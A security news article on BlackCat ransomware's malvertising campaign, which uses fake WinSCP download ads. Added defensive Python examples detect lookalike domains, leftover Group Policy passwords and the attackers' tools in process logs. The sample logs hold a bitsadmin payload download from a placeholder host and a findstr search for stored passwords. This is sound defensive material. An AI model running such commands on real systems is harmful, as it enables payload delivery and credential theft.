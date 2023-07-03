



Ransomware group BlackCat (also known as ALPHV) is using Google and Bing search ads that promote a popular file transfer app as a decoy to drop malicious payloads and infect corporate networks with malware.

This malvertising campaign redirects those who click on malicious ads to a fake WinSCP download page. WinSCP is a popular open source Windows application used to copy files between local computers and remote servers using various transfer protocols.

In a June 30 investigative report, Trend Micro researchers Lucas Silva, Ronjay Caraguey, Arianne Della Cruz, and Gabriel Cardoso outlined how Trend Micro worked with victims compromised through the campaign.

The report covers the range of tools, techniques, and procedures (TTPs) deployed during the attack, including legitimate and illegitimate tools, scripts, and commands, and describes how a separate investigation identified similar TTPs leading to BlackCat infections.

In the first case, the threat actors were successfully removed from the victim’s network, but before that they had obtained and abused top-level administrative privileges, attempted to establish persistence, and used remote administration tools such as AnyDesk to gain backdoor access to the network. The attackers then stole passwords and attempted to access the backup server.

The researchers noted that had intervention come later, the enterprise would very likely have been severely affected by the attack, especially since the threat actor had already gained initial access with domain administrator privileges and had begun establishing backdoors and persistence.

How the ads led to the breach

WinSCP is a useful tool for IT professionals, especially system administrators and web administrators, which makes it ideal bait for victims with access to the kinds of corporate networks BlackCat targets.

The infection begins when a user searches for "WinSCP Download" on the Bing search engine. A malicious ad for the WinSCP application appears above the organic search results. According to the researchers, the ad leads to a suspicious website containing a tutorial on how to use WinSCP to automate file transfers.

The user is then directed to a cloned WinSCP download page at winsccp[.]com, an address that resembles the legitimate WinSCP site, winscp.net, which offers a malicious ISO file for download.
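The lure domain differs from the real one by a single inserted character, which is exactly what an edit-distance check over proxy or DNS logs is meant to catch. The following is an added example, not code from the article or from Trend Micro: it compares the second-level label of an observed domain against an allow-list of legitimate vendor domains (here only winscp.net, as a constructed list) and flags anything within two edits as a lookalike. Defanged `[.]` notation, as used on the page, is accepted as input.

```python
"""Flag lookalike (typosquat) domains against a list of legitimate ones.

Added example, not from the article or the Trend Micro report. The allow-list
LEGIT is constructed for the demo; in practice it would hold the vendor and
tooling domains an organisation actually uses.
"""


def dl_distance(a: str, b: str) -> int:
    """Restricted Damerau-Levenshtein distance: insert, delete, substitute, or
    swap two adjacent characters, each at cost 1."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1,          # deletion
                          d[i][j - 1] + 1,          # insertion
                          d[i - 1][j - 1] + cost)   # substitution / match
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)  # transposition
    return d[len(a)][len(b)]


def normalise(domain: str) -> str:
    """Lower-case, refang '[.]' to '.', strip stray dots."""
    return domain.lower().replace("[.]", ".").strip(".")


def sld(domain: str) -> str:
    """Second-level label: 'www.winscp.net' -> 'winscp'."""
    labels = normalise(domain).split(".")
    return labels[-2] if len(labels) >= 2 else labels[0]


# Constructed allow-list for the demo (assumption: only winscp.net is trusted).
LEGIT = {"winscp.net"}


def classify(domain: str, legit=LEGIT, max_dist: int = 2) -> str:
    """Return 'legit' for an allow-listed domain or its subdomain, 'lookalike'
    when the second-level label is within max_dist edits of an allow-listed
    label (this also catches the same name under a different TLD), and
    'unrelated' otherwise."""
    clean = normalise(domain)
    if clean in legit or any(clean.endswith("." + good) for good in legit):
        return "legit"
    label = sld(clean)
    if any(dl_distance(label, sld(good)) <= max_dist for good in legit):
        return "lookalike"
    return "unrelated"


if __name__ == "__main__":
    for observed in ("winscp.net", "www.winscp.net", "winsccp[.]com", "wincsp.net", "example.com"):
        print(f"{observed:20s} -> {classify(observed)}")
```

The threshold of two edits is a design choice: one edit catches the case on this page, two also catches a swapped pair plus a changed TLD, while higher values start matching unrelated short names, so tune it against your own allow-list before alerting on it.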

The ISO contains two files: setup.exe, a renamed msiexec.exe executable, and msi.dll, a delay-loaded DLL that acts as a dropper for both the genuine WinSCP installer and a malicious Python execution environment that downloads the Cobalt Strike beacon.

The attacker’s toolkit

Cobalt Strike is a red team penetration testing tool used in attack simulations. Cracked versions of the tool are increasingly popular among attackers.

Other tools used in the attack included AdFind, which retrieves and displays information from an Active Directory environment. In the hands of an attacker, AdFind can be used to enumerate user accounts, escalate privileges, and even extract password hashes, according to the Trend Micro report.

The researchers also observed the attacker using AccessChk64, a command line tool from Sysinternals that is primarily used to check the security rights and permissions of objects within Windows. In this case it is not clear what the threat actor used the tool for, but the report notes that beyond showing which permissions have been assigned to users and groups, it can also support privilege escalation by identifying files and services with weak access control settings.

The attackers used the Windows command line tool findstr to search for specific strings in XML files on compromised systems.

The purpose of this command was most likely to identify XML files containing the string cpassword. The researchers say this is notable from a security perspective, as cpassword is associated with a deprecated method of storing passwords in Group Policy settings within AD.
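The attacker's search only pays off if such files still exist, so the defensive counterpart is to audit for them first. The following is an added example, not from the article or the Trend Micro report: it walks a directory tree (in production, the domain's SYSVOL share) and reports every XML element that carries a `cpassword` attribute so the affected Group Policy Preferences can be removed and the accounts' passwords rotated. The sample tree is constructed in a temporary directory with a placeholder value; the attribute name and Groups.xml layout follow the real GPP format, the directory names and everything else are assumptions.

```python
"""Audit Group Policy XML files for the deprecated cpassword attribute.

Added example, not from the article or the Trend Micro report. The sample
files below are constructed; the cpassword value is a placeholder, not a
real ciphertext.
"""
import os
import tempfile
import xml.etree.ElementTree as ET

# Constructed sample content: one Groups.xml with cpassword, one Drives.xml without.
SAMPLE_FILES = {
    os.path.join("Policies", "{GUID-1}", "Machine", "Preferences", "Groups", "Groups.xml"): (
        '<?xml version="1.0" encoding="utf-8"?>\n'
        '<Groups>\n'
        '  <User name="localadmin" changed="2023-01-01 00:00:00">\n'
        '    <Properties action="U" userName="localadmin" cpassword="PLACEHOLDER-NOT-A-REAL-VALUE"/>\n'
        '  </User>\n'
        '</Groups>\n'
    ),
    os.path.join("Policies", "{GUID-2}", "Machine", "Preferences", "Drives", "Drives.xml"): (
        '<?xml version="1.0" encoding="utf-8"?>\n'
        '<Drives>\n'
        '  <Drive name="H:" changed="2023-01-01 00:00:00">\n'
        '    <Properties action="U" path="\\\\fileserver\\home" label="Home"/>\n'
        '  </Drive>\n'
        '</Drives>\n'
    ),
}


def build_sample_tree() -> str:
    """Write the constructed files into a fresh temp directory and return its path."""
    root = tempfile.mkdtemp(prefix="gpp-audit-")
    for rel, body in SAMPLE_FILES.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


def find_cpassword(root: str) -> list:
    """Return one finding per XML element carrying a cpassword attribute.

    Each finding is {file, element, account}. The account attribute name varies
    by preference type (userName for Groups.xml; other types use other names),
    so a small list of candidates is tried."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".xml"):
                continue
            path = os.path.join(dirpath, name)
            try:
                # iterparse streams the file; 'start' events expose attributes
                # without building the whole tree in memory.
                for _event, elem in ET.iterparse(path, events=("start",)):
                    if "cpassword" in elem.attrib:
                        account = next((elem.attrib[k] for k in ("userName", "accountName", "runAs")
                                        if k in elem.attrib), "")
                        findings.append({"file": path, "element": elem.tag, "account": account})
            except ET.ParseError as exc:
                # Malformed XML under SYSVOL is itself worth a look; report rather than skip.
                findings.append({"file": path, "element": "PARSE_ERROR", "account": str(exc)})
    return sorted(findings, key=lambda f: f["file"])


if __name__ == "__main__":
    for finding in find_cpassword(build_sample_tree()):
        print(f"{finding['file']}: <{finding['element']}> account={finding['account']!r}")
```

Point `find_cpassword` at a mounted copy of SYSVOL (read-only) rather than the live share, and treat every hit as a credential to rotate, not just a file to delete, since the value may already have been read.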

PowerShell was used to run scripts including PowerView, part of the PowerSploit collection of penetration testing scripts, which threat actors use to gather information about the victim’s Active Directory environment.

The command line tools PsExec, BitsAdmin and curl were used to download additional tools and move laterally through the environment.

The KillAV BAT script was used in an unsuccessful attempt to disable or bypass any antivirus or antimalware programs installed on the system. The attacker installed AnyDesk to maintain persistence.
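Most of the toolkit described above (the renamed msiexec.exe inside the ISO, findstr hunting for cpassword, AdFind and AccessChk64, PowerView, BitsAdmin and curl downloads, PsExec, and the AnyDesk install) is visible in ordinary process-creation telemetry. The following is an added example, not from the article or Trend Micro: constructed JSON log lines imitating the Sysmon Event ID 1 fields `Image`, `OriginalFileName`, `CommandLine` and `ParentImage` are run through a few rules for those behaviours. The field names follow Sysmon; the sample paths, event ids and command lines are constructed, and `example.invalid` is a placeholder host.

```python
"""Hunt the process-creation TTPs from the WinSCP malvertising case in
Sysmon-style logs.

Added example, not from the article or the Trend Micro report. SAMPLE_LOG is
constructed telemetry (not real IoCs); event ids are arbitrary.
"""
import json
import ntpath

SAMPLE_LOG = r"""
{"id": 1, "Image": "E:\\setup.exe", "OriginalFileName": "msiexec.exe", "CommandLine": "setup.exe", "ParentImage": "C:\\Windows\\explorer.exe"}
{"id": 2, "Image": "C:\\Windows\\System32\\msiexec.exe", "OriginalFileName": "msiexec.exe", "CommandLine": "msiexec.exe /i installer.msi", "ParentImage": "C:\\Windows\\explorer.exe"}
{"id": 3, "Image": "C:\\Windows\\System32\\findstr.exe", "OriginalFileName": "FINDSTR.EXE", "CommandLine": "findstr /S cpassword *.xml", "ParentImage": "C:\\Windows\\System32\\cmd.exe"}
{"id": 4, "Image": "C:\\Users\\Public\\adfind.exe", "OriginalFileName": "AdFind.exe", "CommandLine": "adfind.exe -f objectcategory=person", "ParentImage": "C:\\Windows\\System32\\cmd.exe"}
{"id": 5, "Image": "C:\\Windows\\System32\\bitsadmin.exe", "OriginalFileName": "bitsadmin.exe", "CommandLine": "bitsadmin /transfer job /download http://example.invalid/a.exe C:\\Users\\Public\\a.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe"}
{"id": 6, "Image": "C:\\Program Files (x86)\\AnyDesk\\AnyDesk.exe", "OriginalFileName": "AnyDesk.exe", "CommandLine": "AnyDesk.exe --install", "ParentImage": "C:\\Windows\\System32\\cmd.exe"}
{"id": 7, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "OriginalFileName": "PowerShell.EXE", "CommandLine": "powershell.exe -Command Import-Module .\\PowerView.ps1", "ParentImage": "C:\\Windows\\System32\\cmd.exe"}
{"id": 8, "Image": "C:\\Windows\\System32\\notepad.exe", "OriginalFileName": "NOTEPAD.EXE", "CommandLine": "notepad.exe", "ParentImage": "C:\\Windows\\explorer.exe"}
"""


def _base(path: str) -> str:
    """Lower-cased file name of a Windows path (ntpath works on any host OS)."""
    return ntpath.basename(path).lower()


def _cmd(event: dict) -> str:
    return event.get("CommandLine", "").lower()


# (rule name, predicate over one parsed event). Each rule maps to a behaviour
# named in the report; thresholds are deliberately simple so they are auditable.
RULES = [
    # setup.exe on the ISO is msiexec.exe under another name: the PE's
    # OriginalFileName still says msiexec.exe while the on-disk name does not.
    ("renamed_msiexec", lambda e: e.get("OriginalFileName", "").lower() == "msiexec.exe"
                                  and _base(e["Image"]) != "msiexec.exe"),
    # findstr looking for the deprecated GPP password attribute.
    ("cpassword_search", lambda e: _base(e["Image"]) == "findstr.exe" and "cpassword" in _cmd(e)),
    # AD reconnaissance tooling: AdFind, AccessChk64, or PowerView via PowerShell.
    ("ad_recon_tool", lambda e: _base(e["Image"]) in {"adfind.exe", "accesschk64.exe"}
                                or "powerview" in _cmd(e)),
    # Built-in downloaders and PsExec used to fetch tools and move laterally.
    ("download_or_lateral_tool", lambda e: (_base(e["Image"]) == "bitsadmin.exe" and "/transfer" in _cmd(e))
                                           or (_base(e["Image"]) == "curl.exe" and "http" in _cmd(e))
                                           or _base(e["Image"]).startswith("psexe")),
    # Unsanctioned remote-administration tool being installed for persistence.
    ("remote_admin_install", lambda e: _base(e["Image"]) == "anydesk.exe" and "--install" in _cmd(e)),
]


def parse_log(text: str) -> list:
    """One JSON object per non-empty line."""
    return [json.loads(line) for line in text.strip().splitlines() if line.strip()]


def detect(events: list) -> list:
    """Return (event id, rule name) for every rule each event trips."""
    return [(e["id"], name) for e in events for name, pred in RULES if pred(e)]


if __name__ == "__main__":
    for event_id, rule in detect(parse_log(SAMPLE_LOG)):
        print(f"event {event_id}: {rule}")
```

Event 2, the genuine msiexec.exe, does not trip the renamed-binary rule because name and `OriginalFileName` agree; in real telemetry, expect the AnyDesk and BitsAdmin rules to need an allow-list for sanctioned administration before they are worth alerting on.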

Similar TTPs point to BlackCat

In subsequent Trend Micro investigations, similar TTPs led to the identification of BlackCat infections, and additional tools were observed as well, the researchers said.

In addition to the malware and tools previously mentioned, the researchers were able to identify that SpyBoy Terminator was being used to tamper with the protection provided by antivirus or endpoint detection and response (EDR) agents, they write.

To exfiltrate customer data, the attackers used the PuTTY Secure Copy client (PSCP) to transfer the collected information. While investigating one of the command and control (C&C) domains used by the attackers behind this infection, the researchers also discovered a Cl0p ransomware file that may be related. (The Clop ransomware group is responsible for the recent MOVEit Transfer attack.)

A Twitter user posted that a malvertising campaign with similar TTPs used AnyDesk ads, rather than WinSCP, as the lure.

Trend Micro has published known indicators of compromise from this attack.

In recent years, attackers have become increasingly adept at exploiting vulnerabilities that victims themselves are unaware of, leaving organizations to contend with unpredictable behavior, the researchers write.

In addition to ongoing efforts to prevent unauthorized access, early detection and response within organizational networks is critical. Rapid remediation is also essential, as delayed response times can lead to significant damage.

